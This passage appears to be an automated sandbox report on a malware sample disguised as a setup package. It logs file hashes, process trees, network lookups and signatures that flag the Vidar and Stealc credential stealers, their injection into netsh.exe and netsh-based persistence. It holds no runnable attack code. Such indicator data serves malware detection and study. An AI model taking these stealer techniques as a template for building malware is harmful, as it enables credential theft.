
memory/2144-1-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/2144-11-0x0000000059800000-0x000000005986E000-memory.dmp

memory/2144-13-0x0000000057800000-0x0000000057812000-memory.dmp

memory/2144-14-0x0000000057000000-0x000000005703F000-memory.dmp

memory/2144-12-0x0000000050000000-0x0000000050116000-memory.dmp

memory/2144-10-0x0000000000400000-0x0000000000698000-memory.dmp

memory/2144-16-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2144-15-0x0000000050120000-0x000000005030D000-memory.dmp

memory/2144-17-0x00000000744F2000-0x00000000744F4000-memory.dmp

memory/2144-18-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2144-19-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2612-28-0x00000000744E0000-0x000000007465B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\30952b7c

MD5 c72dbe62a344b8d98ae6fe1c28e7fb19
SHA1 0374c999e0f43dae3cc98c741f25761b29316ca7
SHA256 97a5b686037eaedcdfb2ad97529c830ef44a23d21092cfdfbe0c7281727bce84
SHA512 e50b5fd956793b0913f79921714de2bd021906b17b46a123e42a5dbe8dc4995a4c9cd2c30c3db0bd30404bbae3e4f7fc0270c11326d69613f36ad3c9407acf39

memory/2612-30-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/2612-32-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2612-33-0x00000000744E0000-0x000000007465B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4292-39-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-41-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-42-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-45-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-46-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\ProgramData\HDGIEBGHDAEB\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\HDGIEBGHDAEB\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/4292-123-0x0000000001400000-0x0000000001B4C000-memory.dmp

C:\ProgramData\DHDAKFCGIJ.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/4704-139-0x0000000000400000-0x0000000000913000-memory.dmp

memory/4292-140-0x0000000001400000-0x0000000001B4C000-memory.dmp

C:\ProgramData\AFBAKKFCBF.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/1280-155-0x0000000000D50000-0x0000000000F98000-memory.dmp

memory/4704-161-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58822b52

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/4704-162-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/1280-164-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58ce8638

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/1280-165-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-166-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-173-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4704-174-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a55639c

MD5 24ee63d61846d5c681fd11bc175b8677
SHA1 85dd0289b1b9d2815db5824ad7b9b30a8b344f36
SHA256 5ba7fccb1d10ab49f67ee3bc798ec3526deb40884a25f284d53e35df06d19189
SHA512 63b83c530f118a7b7d2ca4aa3b72ea488a86447a100a046da1fc4b32a9a8c0d5addf195545db781c17cdfc92510d95960a12c341ca8ba3329851ea6825409c95

memory/1280-177-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a757ad9

MD5 038e252a69760e572c5d8195d91bed8e
SHA1 29b052cedbb9eec939a7cc26970dedf3f8251bab
SHA256 ea0c6eb3cdf3aade407c22e3a13c47b4942d61041ed59aa9f41100043aadb4b2
SHA512 24174e8cd3a02aa76f3fc35aa55e2a6aa412da294ce80b368c7d57edc5ac7f7e6ee002b3dd3d48ec517b74a500e270cb3efce3ceac4cf10c31e189b9199a066f

memory/3636-180-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4112-181-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-182-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4112-183-0x0000000072B10000-0x0000000072C8B000-memory.dmp

memory/4292-193-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-194-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4112-195-0x0000000072B10000-0x0000000072C8B000-memory.dmp

memory/4500-202-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

140s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 228

Network

N/A

Files

memory/2892-0-0x0000000050000000-0x0000000050116000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240419-en

Max time kernel

149s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2052 set thread context of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 148

Network

N/A

Files

memory/2052-0-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-1-0x0000000076FC0000-0x0000000077169000-memory.dmp

memory/2052-10-0x00000000740F2000-0x00000000740F4000-memory.dmp

memory/2052-11-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-12-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-14-0x0000000000400000-0x0000000000698000-memory.dmp

memory/2052-21-0x0000000057800000-0x0000000057812000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\83edb132

MD5 20233f925c44eda22f83727c6eebe376
SHA1 3efd0b0161a0314d3061bc94db9b92da1cecb671
SHA256 3c8a28f017c8e76f29a32d33dfb8b6a1c1706c94d371e4abcac462abd6ac2255
SHA512 dc82cb6189c22a8d383e479deea3772d5b4a2f4d6bc0eaabe735ad109588fe5f744849008976caf6560645493a7af2f55f1723b237d3da126b57f17aaafb9051

memory/2052-22-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2052-19-0x0000000050120000-0x000000005030D000-memory.dmp

memory/1800-20-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-18-0x0000000057000000-0x000000005703F000-memory.dmp

memory/2052-17-0x0000000059800000-0x000000005986E000-memory.dmp

memory/2052-15-0x0000000050000000-0x0000000050116000-memory.dmp

memory/1800-23-0x0000000076FC0000-0x0000000077169000-memory.dmp

memory/1800-25-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/1800-26-0x00000000740E0000-0x0000000074254000-memory.dmp

\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2828-32-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2828-31-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2828-34-0x0000000000B30000-0x000000000127C000-memory.dmp

memory/2828-43-0x0000000000B30000-0x000000000127C000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240220-en

Max time kernel

119s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
BE 88.221.83.224:443 www.bing.com tcp
BE 88.221.83.224:443 www.bing.com tcp
US 8.8.8.8:53 224.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 201.64.52.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

113s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4172,i,8447163055677043976,7218082390179600880,262144 --variations-seed-version --mojo-platform-channel-handle=3756 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 13.107.42.16:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.200:443 www.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 200.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

91s

Max time network

100s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
BE 88.221.83.195:443 www.bing.com tcp
US 8.8.8.8:53 195.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 52.111.227.13:443 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

142s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 272

Network

N/A

Files

memory/2432-0-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2432-1-0x0000000050000000-0x0000000050116000-memory.dmp

memory/2432-2-0x0000000050120000-0x000000005030D000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
